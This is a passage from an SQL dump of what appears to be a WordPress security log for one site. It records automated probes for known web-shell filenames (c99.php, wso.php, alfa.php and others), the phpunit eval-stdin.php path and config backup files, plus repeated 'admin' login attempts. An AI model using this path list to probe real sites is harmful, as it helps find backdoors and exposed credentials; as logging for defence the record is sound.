ooks.co.uk/wp-content/wp-admin.php'),('196.117.2.219',3296002779,'',0,1636910019.9481,55,'Y1r8W0qAhDuen7Uim2BsSdxN','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('196.117.2.219',3296002779,'',0,1636910021.0957,55,'zKnDAPekT8MmGUZsdvj3wVfu','','19|0|0|0|ashbooks.co.uk/wp-admin.php'),('196.117.2.219',3296002779,'',0,1636910022.5211,55,'auitv5jRBAGyMU0wEelP4OYq','','19|0|0|0|ashbooks.co.uk/mini.php'),('196.117.2.219',3296002779,'',0,1636910023.7101,55,'x3bylce9vAmDI0HNK85PrVhY','','19|0|0|0|ashbooks.co.uk/old-index.php'),('196.117.2.219',3296002779,'',0,1636910024.4249,55,'5U3Q0LWM7xdniyhVPsr2e4pb','','19|0|0|0|ashbooks.co.uk/doc.php'),('196.117.2.219',3296002779,'',0,1636910025.6674,55,'uBZa5OAEPxzR1WD89SbJGnN0','','19|0|0|0|ashbooks.co.uk/ups.php'),('196.117.2.219',3296002779,'',0,1636910027.2131,55,'hg3f1tL06vDm2CqkXT5Z7WYp','','19|0|0|0|ashbooks.co.uk/shx.php'),('196.117.2.219',3296002779,'',0,1636910028.9507,55,'xQMIsRtBa61djkW5OVXHYZrN','','19|0|0|0|ashbooks.co.uk/FoxWSO.php'),('196.117.2.219',3296002779,'',0,1636910030.3916,55,'Zv5FXtTILldpOHCzemDVyBU3','','19|0|0|0|ashbooks.co.uk/x.php'),('196.117.2.219',3296002779,'',0,1636910031.6077,55,'dvF4lVm2Lx965AYeNn7qajrE','','19|0|0|0|ashbooks.co.uk/cms.php'),('196.117.2.219',3296002779,'',0,1636910032.6780,55,'fyRdz5slA0k7rJY6jZLoVIKn','','19|0|0|0|ashbooks.co.uk/stindex.php'),('196.117.2.219',3296002779,'',0,1636910033.8396,55,'jNtlxyAvCpRP7bHrG3OUKfas','','19|0|0|0|ashbooks.co.uk/wp-uploads.php'),('196.117.2.219',3296002779,'',0,1636910035.2349,55,'McnGPhKk0FIfqJ2LBQxzXwVi','','19|0|0|0|ashbooks.co.uk/autoload_classmap.php'),('196.117.2.219',3296002779,'',0,1636910036.4356,55,'JuAEKjZRdfyBGMwDp8Om01Uq','','19|0|0|0|ashbooks.co.uk/Gel.php'),('196.117.2.219',3296002779,'',0,1636910037.2501,55,'jMdHgx6GNtDRKzk85XFlp1CO','','19|0|0|0|ashbooks.co.uk/defau1t.php'),('196.117.2.219',3296002779,'',0,1636910038.2476,55,'ICGV52Tn0OxwXZpNg7k3ytce','','19|0|0|0|ashbooks.co.uk/0byte.php'),('196.117.2.219',3296002779,'',0,1636910039.4017,55,'LZPQb07q5gF1jrMfN9ke3WpI','','19|0|0|0|ashbooks.co.uk/wp.php'),('196.117.2.219',3296002779,'',0,1636910041.3916,55,'wnESGKR6gHWJt31kZ9OIiaQP','','19|0|0|0|ashbooks.co.uk/41.php'),('196.117.2.219',3296002779,'',0,1636910043.0116,55,'xO3coVTRH0eL4srMpB5wakKj','','19|0|0|0|ashbooks.co.uk/media-admin.php'),('196.117.2.219',3296002779,'',0,1636910045.0476,55,'DJImBVYiyxAHWS974jTLGdZ8','','19|0|0|0|ashbooks.co.uk/4price.php'),('196.117.2.219',3296002779,'',0,1636910047.0276,55,'23s9vWyZJLtP8BefmFoMdDuC','','19|0|0|0|ashbooks.co.uk/MARIJUANA.php'),('196.117.2.219',3296002779,'',0,1636910048.2996,55,'mFGPBWAxszu0TDhKN7jSlk9U','','19|0|0|0|ashbooks.co.uk/f.php'),('196.117.2.219',3296002779,'',0,1636910049.8436,55,'rtBjI3oMpF6U9qJCnAcDyOvm','','19|0|0|0|ashbooks.co.uk/.fk.php'),('196.117.2.219',3296002779,'',0,1636910051.6309,55,'ZFQa4p8bhkRYwzx9MjLI1N7V','','19|0|0|0|ashbooks.co.uk/wikindex.php'),('196.117.2.219',3296002779,'',0,1636910053.0476,55,'zcWfl8IdNTPRh4p7wEjMU2yi','','19|0|0|0|ashbooks.co.uk/xox.php'),('196.117.2.219',3296002779,'',0,1636910054.3168,55,'EJMrOZGRwHI9lNgzfk3yBsVT','','19|0|0|0|ashbooks.co.uk/o.php'),('196.117.2.219',3296002779,'',0,1636910055.2996,55,'cvjpXUFlChugRGf2JAy57IkY','','19|0|0|0|ashbooks.co.uk/new.php'),('196.117.2.219',3296002779,'',0,1636910057.0861,55,'3m0sMRlxBuHTNqC5fZzVvAec','','19|0|0|0|ashbooks.co.uk/3index.php'),('196.117.2.219',3296002779,'',0,1636910058.9116,55,'k5rzxsEHbym2Ga7qldBUAYR9','','19|0|0|0|ashbooks.co.uk/sindex.php'),('196.117.2.219',3296002779,'',0,1636910060.3676,55,'q7BiFADnoGhVkgrHxj5XZJIP','','19|0|0|0|ashbooks.co.uk/baindex.php'),('196.117.2.219',3296002779,'',0,1636910061.8437,55,'hjRQTWNGpLmqrtAyZV2kxE0K','','19|0|0|0|ashbooks.co.uk/new-index.php'),('196.117.2.219',3296002779,'',0,1636910063.5316,55,'9NDUsohyfF2d1mzAxTpGLw5i','','19|0|0|0|ashbooks.co.uk/wi.php'),('196.117.2.219',3296002779,'',0,1636910064.5036,55,'AD4PYfXHOwyCu0l9ZidxNqnV','','19|0|0|0|ashbooks.co.uk/XxX.php'),('196.117.2.219',3296002779,'',0,1636910065.3008,55,'Qdl5eNFGBUML0VCfHhYocgnP','','19|0|0|0|ashbooks.co.uk/mar.php'),('196.117.2.219',3296002779,'',0,1636910067.9285,55,'ci2l3guv89LG4BKmyp60jRhO','','19|0|0|0|ashbooks.co.uk/root.php'),('196.117.2.219',3296002779,'',0,1636910068.9998,55,'k12xjvtSPJp8eKzZG6DfBEyw','','19|0|0|0|ashbooks.co.uk/11index.php'),('196.117.2.219',3296002779,'',0,1636910070.4115,50,'YGZ6sRvSTidDJmzuN2hgHkra','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('196.117.2.219',3296002779,'',0,1636910071.7046,55,'SZuksaIh93HKDVTnFgiLqXJ7','','19|0|0|0|ashbooks.co.uk/nee.php'),('139.59.118.238',2335930094,'admin',0,1636910071.9101,7,'uoLQIk8ea9ElGhOfiytMJz6P','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('196.117.2.219',3296002779,'',0,1636910073.0797,55,'R625arcZwxh8AgGemikjUKon','','19|0|0|0|ashbooks.co.uk/v.php'),('196.117.2.219',3296002779,'',0,1636910074.1157,55,'fjN7HuqDO8viWFpUACgLRxeb','','19|0|0|0|ashbooks.co.uk/z.php'),('196.117.2.219',3296002779,'',0,1636910075.7116,55,'FukDogbXMN6ZP54teylfOUsH','','19|0|0|0|ashbooks.co.uk/xx.php'),('196.117.2.219',3296002779,'',0,1636910077.7520,55,'QC6pWDBV2Tr8079Eu3PMwGzA','','19|0|0|0|ashbooks.co.uk/g.php'),('196.117.2.219',3296002779,'',0,1636910079.0516,55,'n4PGgmojS2Ai5QlELqw3RTpv','','19|0|0|0|ashbooks.co.uk/m.php'),('196.117.2.219',3296002779,'',0,1636910079.8322,55,'i5sG1zMEUck3CdPqxjmvwh9D','','19|0|0|0|ashbooks.co.uk/shell.php'),('196.117.2.219',3296002779,'',0,1636910080.8602,55,'ZrWpuDciXEQSjd2w1NvI3faA','','19|0|0|0|ashbooks.co.uk/sh3ll.php'),('196.117.2.219',3296002779,'',0,1636910081.7978,55,'RC9kl7KPYJGS0otLTV5WO6HQ','','19|0|0|0|ashbooks.co.uk/c99.php'),('196.117.2.219',3296002779,'',0,1636910083.8044,55,'ve5h97TjR8PF3iqOSt4wlELU','','19|0|0|0|ashbooks.co.uk/alexuse.php'),('196.117.2.219',3296002779,'',0,1636910086.0893,55,'A7qeXhrG8ymbvZc4OFlTSatk','','19|0|0|0|ashbooks.co.uk/w.php'),('196.117.2.219',3296002779,'',0,1636910087.1476,55,'5JXATgpisy9fanUoY7jQmBOz','','19|0|0|0|ashbooks.co.uk/ws.php'),('196.117.2.219',3296002779,'',0,1636910088.1356,55,'CdcH95Sjf7G68UmkLoEYhQ3T','','19|0|0|0|ashbooks.co.uk/2.php'),('196.117.2.219',3296002779,'',0,1636910089.5684,55,'UVxXH1fgkGZMp49qs53dtRuB','','19|0|0|0|ashbooks.co.uk/lol.php'),('196.117.2.219',3296002779,'',0,1636910090.4991,55,'zDLPVil7RYOHrp4UZ6a10KhT','','19|0|0|0|ashbooks.co.uk/87.php'),('196.117.2.219',3296002779,'',0,1636910091.0805,55,'iyonVPcXq1xhAHJdZ0DIaY8m','','19|0|0|0|ashbooks.co.uk/7yn.php'),('196.117.2.219',3296002779,'',0,1636910092.8476,55,'45o37tASLBFuEmY2sd91U6Xy','','19|0|0|0|ashbooks.co.uk/haxor.php'),('196.117.2.219',3296002779,'',0,1636910094.1601,55,'VHr1dxB8Qky79TXuOFKj4ZJM','','19|0|0|0|ashbooks.co.uk/403.php'),('196.117.2.219',3296002779,'',0,1636910095.4636,55,'XRweUfLSltrhc2sJZ8BnxVdF','','19|0|0|0|ashbooks.co.uk/13.php'),('196.117.2.219',3296002779,'',0,1636910096.9596,55,'eLPyVSoqQjuB06tmW3RxkcOX','','19|0|0|0|ashbooks.co.uk/cpanel.php'),('104.154.85.100',1754944868,'admin',0,1636910791.6882,7,'jmcPfzsULIthunYqZoWHpi7N','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('35.203.61.118',600522102,'admin',0,1636911514.5774,7,'7bpBhLx6ry1SGquQCDTMle2A','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.146.241.20',395505940,'',0,1636912295.1356,55,'ehlNq8yPDTu2d0pCo9ctwvMj','','19|0|0|0|ashbooks.co.uk/haders.php'),('23.146.241.20',395505940,'',0,1636912296.5183,55,'liYZEPrkOwCoSH6t0UyWRech','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('23.146.241.20',395505940,'',0,1636912298.2966,55,'ulBGbrAg4t0JjpsKWX9ESL8Z','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('23.146.241.20',395505940,'',0,1636912300.1156,55,'fbjFR0DLsoUTC71ygnJOeZmS','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('23.146.241.20',395505940,'',0,1636912302.0596,55,'RlpdeqPa3YW1SyEXKmJIcrzT','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('23.146.241.20',395505940,'',0,1636912302.1394,10,'RlpdeqPa3YW1SyEXKmJIcrzT','','707|0|0|0|ashbooks.co.uk/config.bak.php'),('23.146.241.20',395505940,'',0,1636912303.9716,100,'sConm4XJlr6wVUbLv0kaK3hu','','13|0|0|0|ashbooks.co.uk/style.php'),('23.146.241.20',395505940,'',0,1636912305.7916,100,'DN0L6yT3evpQASzEgkPrth2q','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('23.146.241.20',395505940,'',0,1636912307.1676,55,'foPkQ7wsx8DjVglp6IC9Ebnu','','19|0|0|0|ashbooks.co.uk/old-index.php'),('23.146.241.20',395505940,'',0,1636912308.8012,55,'ZNmBfTqxPzHLiOdWkvAJ2p9a','','19|0|0|0|ashbooks.co.uk/magic-old-index.php'),('23.146.241.20',395505940,'',0,1636912310.0254,55,'F40oc57DXkBYTSgHbJKiqxtV','','19|0|0|0|ashbooks.co.uk/upload.php'),('23.146.241.20',395505940,'',0,1636912311.5877,55,'M4zBRZn23dXYCps8qgjvoKiP','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('23.146.241.20',395505940,'',0,1636912313.1498,100,'bIuAHMmKWQDvwxELF2BCz5c0','','13|0|0|0|ashbooks.co.uk/test.php'),('23.146.241.20',395505940,'',0,1636912315.2762,100,'CbSy9hp2AKlxiEqzo5BR0Yv6','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('23.146.241.20',395505940,'',0,1636912316.4906,100,'L4FeC3HXmcWr8kbh9z5yJ6ND','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('23.146.241.20',395505940,'',0,1636912318.1836,55,'pD3rjyKaoTGY90Zh8AbVknOE','','19|0|0|0|ashbooks.co.uk/moduless.php'),('23.146.241.20',395505940,'',0,1636912320.9545,55,'9NyLP2GS7mstOb0vQlDHYMTw','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('23.146.241.20',395505940,'',0,1636912322.8895,55,'3qN0zwuDcPCglpoQMJjXYfxr','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('23.146.241.20',395505940,'',0,1636912324.0699,55,'kW4ZFcUGV5KdnrvLfpuNaT6s','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('128.199.14.4',2160528900,'admin',0,1636913019.6427,7,'2slRVoZHFg0TkBzGOh7EbCvn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.225.29.51',1088494899,'admin',0,1636913805.4336,7,'GlrLePKpRjTBWcF9vEtsxgqy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.1.209.37',50450725,'admin',0,1636914565.4702,7,'I5Yg0o4J93rQqvRdXExBGibh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.86.84.227',2807452899,'admin',0,1636915322.2096,7,'CqrIdeF7vwPpD09TbLkY1aR8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('196.117.2.219',3296002779,'',0,1636915572.7556,55,'yLTa6B0ZRsOWvpiwoVKGAeJq','','19|0|0|0|ashbooks.co.uk/leaf.php'),('196.117.2.219',3296002779,'',0,1636915611.1939,55,'ztHUrlKexhuJob8j76Mpc1Bq','','19|0|0|0|ashbooks.co.uk/alex.php'),('196.117.2.219',3296002779,'',0,1636915627.7493,55,'c1Rz7WoZkNaVG3MsyvYJjuHr','','19|0|0|0|ashbooks.co.uk/mailer.php'),('196.117.2.219',3296002779,'',0,1636915628.0146,55,'GN9ZlJbf7vRtAs6MeFudzH1D','','19|0|0|0|ashbooks.co.uk/anone.php'),('196.117.2.219',3296002779,'',0,1636915628.6731,55,'Kkl06Fjmxnh9WLaov2DfudAT','','19|0|0|0|ashbooks.co.uk/a.php'),('196.117.2.219',3296002779,'',0,1636915628.6976,10,'Kkl06Fjmxnh9WLaov2DfudAT','','707|0|0|0|ashbooks.co.uk/a.php'),('196.117.2.219',3296002779,'',0,1636915629.0349,55,'tpybedV94CY7FXoal8sNwW1z','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('196.117.2.219',3296002779,'',0,1636915629.6350,55,'YKUtSFdzTsI6HfAh1BRcWu3N','','19|0|0|0|ashbooks.co.uk/alfa.php'),('196.117.2.219',3296002779,'',0,1636915629.9662,55,'R0HkuVAZI37PFQBJTtUEgeWM','','19|0|0|0|ashbooks.co.uk/wso.php'),('196.117.2.219',3296002779,'',0,1636915630.5441,55,'LcS4Ov0pygmDWeAlfXUboa8w','','19|0|0|0|ashbooks.co.uk/c.php'),('196.117.2.219',3296002779,'',0,1636915630.9083,55,'d4GWtq1wTIFke90j82HnQCJi','','19|0|0|0|ashbooks.co.uk/1.php'),('196.117.2.219',3296002779,'',0,1636915631.5867,55,'kS6tVzb3ch09doZUeAX8mvqu','','19|0|0|0|ashbooks.co.uk/send.php'),('196.117.2.219',3296002779,'',0,1636915631.9628,55,'4poPwzKARhHTsJxe1SXDYFqI','','19|0|0|0|ashbooks.co.uk/3.php'),('196.117.2.219',3296002779,'',0,1636915632.8166,55,'Btij2AG80JZuIceq45PQyU9V','','19|0|0|0|ashbooks.co.uk/404.php'),('196.117.2.219',3296002779,'',0,1636915633.5096,55,'z3xSX1tWDlHgvNBqAIip8uYF','','19|0|0|0|ashbooks.co.uk/sym.php'),('196.117.2.219',3296002779,'',0,1636915634.0409,55,'ukrVQETIU3x6zb4tjfsKO19q','','19|0|0|0|ashbooks.co.uk/wp-confirm.php'),('196.117.2.219',3296002779,'',0,1636915634.6470,55,'pdgYJ9mwAtCq3GW8FQhVxSvl','','19|0|0|0|ashbooks.co.uk/images/vuln.php'),('196.117.2.219',3296002779,'',0,1636915635.4381,55,'w21kU3Or7nRPAZcJN9Kziehb','','19|0|0|0|ashbooks.co.uk/dr.php'),('196.117.2.219',3296002779,'',0,1636915635.8768,55,'dHzYimS6X0Zvr8qpf7NjUEx4','','19|0|0|0|ashbooks.co.uk/upload.php'),('196.117.2.219',3296002779,'',0,1636915636.4718,55,'9KM7Q1d6U4CiPGaOq2SXngvj','','19|0|0|0|ashbooks.co.uk/bypass.php'),('196.117.2.219',3296002779,'',0,1636915636.8390,55,'IREWSuoiJ2xKcPOdaNp85bkX','','19|0|0|0|ashbooks.co.uk/wp-blog.php'),('196.117.2.219',3296002779,'',0,1636915637.5449,55,'CIgLAGXkjYhdNTMvoznDq1OP','','19|0|0|0|ashbooks.co.uk/data.php'),('196.117.2.219',3296002779,'',0,1636915637.9185,55,'RDi8FUa2KQALS7JpfuvO9GrY','','19|0|0|0|ashbooks.co.uk/owl.php'),('196.117.2.219',3296002779,'',0,1636915638.5542,55,'AM97tdjTX53OmRlLHovZqJkK','','19|0|0|0|ashbooks.co.uk/vuln.php'),('196.117.2.219',3296002779,'',0,1636915638.8726,55,'6bqDriJC2s7dQEyHUlRT40zf','','19|0|0|0|ashbooks.co.uk/symlink.php'),('196.117.2.219',3296002779,'',0,1636915639.5300,55,'x1YvVKnTXifLM7jlOQat5s8z','','19|0|0|0|ashbooks.co.uk/ohayo.php'),('196.117.2.219',3296002779,'',0,1636915640.0502,55,'0BhbOL6Ej7ys5efdvXro9Itc','','19|0|0|0|ashbooks.co.uk/100.php'),('196.117.2.219',3296002779,'',0,1636915640.6643,55,'Fj9TL3HW1uVypIn7ogSXMPJC','','19|0|0|0|ashbooks.co.uk/777.php'),('196.117.2.219',3296002779,'',0,1636915641.0397,55,'Pb4tQO0a2VER86dUg1hTou9D','','19|0|0|0|ashbooks.co.uk/wp-content/wp-logins.php'),('196.117.2.219',3296002779,'',0,1636915641.6895,55,'m30MVnCHgtQSONDj5rx91ZEh','','19|0|0|0|ashbooks.co.uk/1index.php'),('196.117.2.219',3296002779,'',0,1636915642.4209,55,'deskS5OTNafbg7ZPcyDFrmHU','','19|0|0|0|ashbooks.co.uk/wp-wso.php'),('196.117.2.219',3296002779,'',0,1636915642.7355,55,'kr2MUfAmEKcNdRTb5zlVvFxo','','19|0|0|0|ashbooks.co.uk/2index.php'),('196.117.2.219',3296002779,'',0,1636915643.7099,55,'wYEXJlSx3okVas59mNO1FDAd','','19|0|0|0|ashbooks.co.uk/wp-content/wp-admin.php'),('196.117.2.219',3296002779,'',0,1636915644.8670,55,'BqugejIFA36kV0E71sHWQMzc','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('196.117.2.219',3296002779,'',0,1636915645.4708,55,'Tfx5qEO8vRJLnbWajzCAewFB','','19|0|0|0|ashbooks.co.uk/wp-admin.php'),('196.117.2.219',3296002779,'',0,1636915645.7671,55,'dFfHhAp4vbmzY5XW9CkNSxU6','','19|0|0|0|ashbooks.co.uk/mini.php'),('196.117.2.219',3296002779,'',0,1636915646.0994,55,'C3NHbTmgersliSkwnzv4PYXU','','19|0|0|0|ashbooks.co.uk/old-index.php'),('196.117.2.219',3296002779,'',0,1636915646.6902,55,'j6e4qPfWZHl08xcOIugDAdKG','','19|0|0|0|ashbooks.co.uk/doc.php'),('196.117.2.219',3296002779,'',0,1636915647.0104,55,'ViQ6uybCgqRSfHF47GAp3Ox9','','19|0|0|0|ashbooks.co.uk/ups.php'),('196.117.2.219',3296002779,'',0,1636915647.6226,55,'SU39G01TF2Ye64kulLoMNHXA','','19|0|0|0|ashbooks.co.uk/shx.php'),('196.117.2.219',3296002779,'',0,1636915647.9255,55,'AQZ3lId0hRPYeKHF6xLaJ95M','','19|0|0|0|ashbooks.co.uk/FoxWSO.php'),('196.117.2.219',3296002779,'',0,1636915648.5703,55,'mJg2V4MOY6n8TseZFjI397Gc','','19|0|0|0|ashbooks.co.uk/x.php'),('196.117.2.219',3296002779,'',0,1636915648.8621,55,'Es5tq9mxMGQw7vfdJr6uB8i1','','19|0|0|0|ashbooks.co.uk/cms.php'),('196.117.2.219',3296002779,'',0,1636915649.4248,55,'6zaYEyt1J2mcSPDruRAkX7Z9','','19|0|0|0|ashbooks.co.uk/stindex.php'),('196.117.2.219',3296002779,'',0,1636915650.4436,55,'eaZ8Bo7rSxynlLWFIs6MqVpX','','19|0|0|0|ashbooks.co.uk/wp-uploads.php'),('196.117.2.219',3296002779,'',0,1636915650.8114,55,'xERDtWbsQFignJoUdfThwcuK','','19|0|0|0|ashbooks.co.uk/autoload_classmap.php'),('196.117.2.219',3296002779,'',0,1636915651.4526,55,'DFvAa2HNOT1qMZsEJzn6Rtp7','','19|0|0|0|ashbooks.co.uk/Gel.php'),('196.117.2.219',3296002779,'',0,1636915651.7820,55,'TOeDYWbZFltN7Sr46u3Bv0my','','19|0|0|0|ashbooks.co.uk/defau1t.php'),('196.117.2.219',3296002779,'',0,1636915652.6421,55,'HGSt1KzwjnhWF49Q6lZ2aX3y','','19|0|0|0|ashbooks.co.uk/0byte.php'),('196.117.2.219',3296002779,'',0,1636915653.4847,55,'rzQdNeg92LOJSyucTHpIni3v','','19|0|0|0|ashbooks.co.uk/wp.php'),('196.117.2.219',3296002779,'',0,1636915653.7530,55,'kNuo5H6Ivfj1wMKZzt7TPlbp','','19|0|0|0|ashbooks.co.uk/41.php'),('196.117.2.219',3296002779,'',0,1636915654.5031,55,'GfPxKOjeCB39IU4oyu2RLmhD','','19|0|0|0|ashbooks.co.uk/media-admin.php'),('196.117.2.219',3296002779,'',0,1636915654.8511,55,'VSkpjwBN4rlqncZJOUTtCfI1','','19|0|0|0|ashbooks.co.uk/4price.php'),('196.117.2.219',3296002779,'',0,1636915655.4175,55,'OL5jaoAkP0ypXRZfeExGNcln','','19|0|0|0|ashbooks.co.uk/MARIJUANA.php'),('196.117.2.219',3296002779,'',0,1636915655.7565,55,'C4ie01EDPO7UWIj8HGbQaYVm','','19|0|0|0|ashbooks.co.uk/f.php'),('196.117.2.219',3296002779,'',0,1636915656.7308,55,'tiGWjkI6NZyHJX8BSfKs0u4e','','19|0|0|0|ashbooks.co.uk/.fk.php'),('196.117.2.219',3296002779,'',0,1636915657.0460,55,'r48ZIdjFlVXDBoS6kQ29xCnL','','19|0|0|0|ashbooks.co.uk/wikindex.php'),('196.117.2.219',3296002779,'',0,1636915657.6511,55,'YynMbjRcZf1lPSixz8hwKVNU','','19|0|0|0|ashbooks.co.uk/xox.php'),('196.117.2.219',3296002779,'',0,1636915657.9582,55,'mbk5tAEhsvxGD6HzUq2r4Fcn','','19|0|0|0|ashbooks.co.uk/o.php'),('196.117.2.219',3296002779,'',0,1636915658.5465,55,'SBpR70ziVEdOJZbLjvoYlPnc','','19|0|0|0|ashbooks.co.uk/new.php'),('196.117.2.219',3296002779,'',0,1636915658.9966,55,'61f9jxeK5wNriR72QMFsSY3u','','19|0|0|0|ashbooks.co.uk/3index.php'),('196.117.2.219',3296002779,'',0,1636915659.5601,55,'CVreFBKcWgU9wZ1moY5asMSI','','19|0|0|0|ashbooks.co.uk/sindex.php'),('196.117.2.219',3296002779,'',0,1636915659.9736,55,'bpw0Eg2GBNxJMoRDafW9AkHU','','19|0|0|0|ashbooks.co.uk/baindex.php'),('196.117.2.219',3296002779,'',0,1636915660.4792,55,'Y0gLeol7fKH8U9sncau4F1qW','','19|0|0|0|ashbooks.co.uk/new-index.php'),('196.117.2.219',3296002779,'',0,1636915660.8838,55,'r0EuASiwLg2qUkfxXz9RN4IC','','19|0|0|0|ashbooks.co.uk/wi.php'),('196.117.2.219',3296002779,'',0,1636915661.6612,55,'OupzB1HJoI6YMGyk5dgDX8NZ','','19|0|0|0|ashbooks.co.uk/XxX.php'),('196.117.2.219',3296002779,'',0,1636915662.4230,55,'Eael0xJ7ir9qdutcHUPwNzyb','','19|0|0|0|ashbooks.co.uk/mar.php'),('196.117.2.219',3296002779,'',0,1636915662.9453,55,'n3mdvqDu9E6GgB5ayleSiAZp','','19|0|0|0|ashbooks.co.uk/root.php'),('196.117.2.219',3296002779,'',0,1636915663.5169,55,'IxLsX5bjhcentCviEodfm1J2','','19|0|0|0|ashbooks.co.uk/11index.php'),('196.117.2.219',3296002779,'',0,1636915663.8467,50,'amIDWQ28EfZHGPrOYLlxj3JA','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('196.117.2.219',3296002779,'',0,1636915664.4688,55,'GVeLdrhFWN04uPlo2SDBnvqf','','19|0|0|0|ashbooks.co.uk/nee.php'),('196.117.2.219',3296002779,'',0,1636915664.9440,55,'Ty6g7SRACmKzf5aNusFQ19UV','','19|0|0|0|ashbooks.co.uk/v.php'),('196.117.2.219',3296002779,'',0,1636915665.8661,55,'oYeiIAJ0aNX2cvLUwgx4C8lB','','19|0|0|0|ashbooks.co.uk/z.php'),('196.117.2.219',3296002779,'',0,1636915666.4524,55,'EzafItYRK8y1NMeswp2S6Djm','','19|0|0|0|ashbooks.co.uk/xx.php'),('196.117.2.219',3296002779,'',0,1636915666.7212,55,'QUzajby2HVJKWGZuMkNgo70Y','','19|0|0|0|ashbooks.co.uk/g.php'),('196.117.2.219',3296002779,'',0,1636915667.0447,55,'2kon0We3iZ9xRalH86IyAOM1','','19|0|0|0|ashbooks.co.uk/m.php'),('196.117.2.219',3296002779,'',0,1636915667.6165,55,'MfCSoz9ETXeJ2rcQ1yAnqBGD','','19|0|0|0|ashbooks.co.uk/shell.php'),('196.117.2.219',3296002779,'',0,1636915667.8903,55,'ka4VLt6XcluR1H3wvqSFNB5O','','19|0|0|0|ashbooks.co.uk/sh3ll.php'),('196.117.2.219',3296002779,'',0,1636915668.4603,55,'7zBFlmpaG31UDWKTnq2PeoOw','','19|0|0|0|ashbooks.co.uk/c99.php'),('196.117.2.219',3296002779,'',0,1636915668.7347,55,'wTBClaM5qicb9DJ7SGQkEPHI','','19|0|0|0|ashbooks.co.uk/alexuse.php'),('196.117.2.219',3296002779,'',0,1636915669.0132,55,'eMCwcITkNmrZXL4OPH0dgqj1','','19|0|0|0|ashbooks.co.uk/w.php'),('196.117.2.219',3296002779,'',0,1636915669.5990,55,'kEloL26nvAuSCarm4xP3IdOJ','','19|0|0|0|ashbooks.co.uk/ws.php'),('196.117.2.219',3296002779,'',0,1636915669.9012,55,'C9cOvB0AeuXfU4TGwryx5n67','','19|0|0|0|ashbooks.co.uk/2.php'),('196.117.2.219',3296002779,'',0,1636915670.6150,55,'N2o0gy3UKSIznTmHBRJYGdqk','','19|0|0|0|ashbooks.co.uk/lol.php'),('196.117.2.219',3296002779,'',0,1636915670.8967,55,'qxPWo1YbL0J6ywegOaX4jd5R','','19|0|0|0|ashbooks.co.uk/87.php'),('196.117.2.219',3296002779,'',0,1636915671.4149,55,'xEWsmqidIJZFXgDf8Nnk9AO2','','19|0|0|0|ashbooks.co.uk/7yn.php'),('196.117.2.219',3296002779,'',0,1636915671.7113,55,'0ZfQIdK5EF9OktmYR61zJiHw','','19|0|0|0|ashbooks.co.uk/haxor.php'),('196.117.2.219',3296002779,'',0,1636915672.0422,55,'ZLIl6E2acwNofhM4PUs3KHkF','','19|0|0|0|ashbooks.co.uk/403.php'),('196.117.2.219',3296002779,'',0,1636915672.5607,55,'3GJKZNiFvEefacB6TylLzXO8','','19|0|0|0|ashbooks.co.uk/13.php'),('196.117.2.219',3296002779,'',0,1636915672.8516,55,'nmgRB1Kxiz9WkP2NwuAYpOS0','','19|0|0|0|ashbooks.co.uk/cpanel.php'),('169.60.78.94',2839301726,'admin',0,1636916020.5127,7,'fQLeKcH1ow02kmVOs8WFB5XI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.146.241.20',395505940,'',0,1636916809.3890,55,'yczj8kHZ5LfiqDasNBmExdC6','','19|0|0|0|www.ashbooks.co.uk/haders.php'),('23.146.241.20',395505940,'',0,1636916810.5256,55,'3a6NEuskCI21vogp5yAFT80j','','19|0|0|0|www.ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('23.146.241.20',395505940,'',0,1636916811.7489,55,'VWav8hS15PwzKLHlZXkEjynA','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/backup_index.php'),('23.146.241.20',395505940,'',0,1636916813.0987,55,'CtxOw6K8FQVZqnedINMmlvPh','','19|0|0|0|www.ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('23.146.241.20',395505940,'',0,1636916814.4080,55,'LHrIwCZq2lOzJAmEVMBSYD8e','','19|0|0|0|www.ashbooks.co.uk/config.bak.php'),('23.146.241.20',395505940,'',0,1636916814.4326,10,'LHrIwCZq2lOzJAmEVMBSYD8e','','707|0|0|0|www.ashbooks.co.uk/config.bak.php'),('23.146.241.20',395505940,'',0,1636916815.5558,100,'kgPiASI6f9CbnRJmXuWtLs3r','','13|0|0|0|www.ashbooks.co.uk/style.php'),('23.146.241.20',395505940,'',0,1636916816.8242,100,'vcu6oWPEa4VzpCdTeGULIZ5Q','','13|0|0|0|www.ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('23.146.241.20',395505940,'',0,1636916818.2045,55,'qGpwAFoC3SQ4e8H76RVvakzO','','19|0|0|0|www.ashbooks.co.uk/old-index.php'),('23.146.241.20',395505940,'',0,1636916819.0499,55,'RIj3PeMhiXwKr2ayqsEcN9Qk','','19|0|0|0|www.ashbooks.co.uk/magic-old-index.php'),('23.146.241.20',395505940,'',0,1636916820.0591,55,'gAm8qUaWStv1Ph3cTJQduV9K','','19|0|0|0|www.ashbooks.co.uk/upload.php'),('23.146.241.20',395505940,'',0,1636916821.4620,55,'IwHPxs7EYGTcuS3r6aoMZlqn','','19|0|